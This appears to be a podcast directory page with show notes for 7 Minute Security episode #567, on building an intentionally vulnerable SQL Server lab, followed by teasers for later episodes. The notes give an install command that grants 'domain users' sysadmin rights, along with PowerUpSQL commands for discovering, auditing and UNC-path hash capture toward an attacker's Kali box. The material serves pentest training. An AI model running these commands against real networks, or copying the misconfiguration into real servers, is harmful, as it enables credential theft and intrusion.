7MS #567: How to Build an Intentionally Vulnerable SQL Server
7 Minute Security14 Apr 2023

7MS #567: How to Build an Intentionally Vulnerable SQL Server

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

  • Download SQL Server here

  • Install SQL via config .ini file

  • Or, install SQL via pure command line

  • Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users" $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}
  • Audit the discovered SQL servers:
Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose
  • Fire off stored procedures to catch hashes!
Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

Avsnitt(713)

7MS #713: How to Secure Your Community – Part 3

7MS #713: How to Secure Your Community – Part 3

Hello friends, in today's edition of How to Secure Your Community, I give a brief recap of part 1 and part 2, and then dive into some cool phone shortcuts you can setup so that with a single tap, you ...

13 Mars 31min

7MS #712: How to Secure Your Community - Part 2

7MS #712: How to Secure Your Community - Part 2

Hello friends.  Today's episode piggybacks off of last week's discussion of Operation Metro Surge and how it has affected the state of Minnesota.  I also highly encourage you to read this Rolling Ston...

6 Mars 37min

7MS #711: How to Secure Your Community

7MS #711: How to Secure Your Community

Hello friends, it's good to be back with you.  I took a podcast hiatus in January to focus on helping communities affected by Operation Metro Surge.  Today I share how my family and community has been...

27 Feb 51min

7MS #710: I'm Taking a Break

7MS #710: I'm Taking a Break

Hi friends, I'm going to be taking a break from producing podcast episodes, as well as content over at 7MinSec.club.  It's a temporary break, so please don't unsubscribe, unfollow, etc.  I need some e...

17 Jan 4min

7MS #709: Second Impressions of Twingate

7MS #709: Second Impressions of Twingate

Hey friends, in episode #649 I gave you my first impressions of Twingate.  It's been a minute, so I thought I'd revisit Twingate (specifically this awesome Twingate LXC) and talk about how we're using...

10 Jan 20min

7MS #708: Tales of Pentest Fail – Part 6

7MS #708: Tales of Pentest Fail – Part 6

After sharing a recent story about how a phishing campaign went south, I heard feedback from a lot of you.  You either commiserated with my story, told me I wussed out, and/or had a difficult story of...

2 Jan 25min

7MS #707: Our New Pentest Course Has Launched!

7MS #707: Our New Pentest Course Has Launched!

Today we're thrilled to announce the launch of LPLITE:GOAD (Light Pentest Live Interactive Training Experience: Game of Active Directory). The first class is coming up Tuesday, January 27 – Thursday, ...

26 Dec 202514min

7MS #706: Tales of Pentest Pwnage – Part 80

7MS #706: Tales of Pentest Pwnage – Part 80

I'm so excited to share today's tale of pentest pwnage, because it brings back to life a coercion technique I thought wouldn't work against Windows 11! Spoiler alert: check out rpc2efs, as well as the...

19 Dec 202529min

Populärt inom Politik & nyheter

svenska-fall
aftonbladet-krim
p3-krim
rss-krimstad
fordomspodden
flashback-forever
rss-expressen-dok
motiv
aftonbladet-daily
spar
blenda-2
rss-sanning-konsekvens
svd-ledarredaktionen
rss-vad-fan-hande
olyckan-inifran
rss-krimreportrarna
dagens-eko
rss-frandfors-horna
kungligt
svd-nyhetsartiklar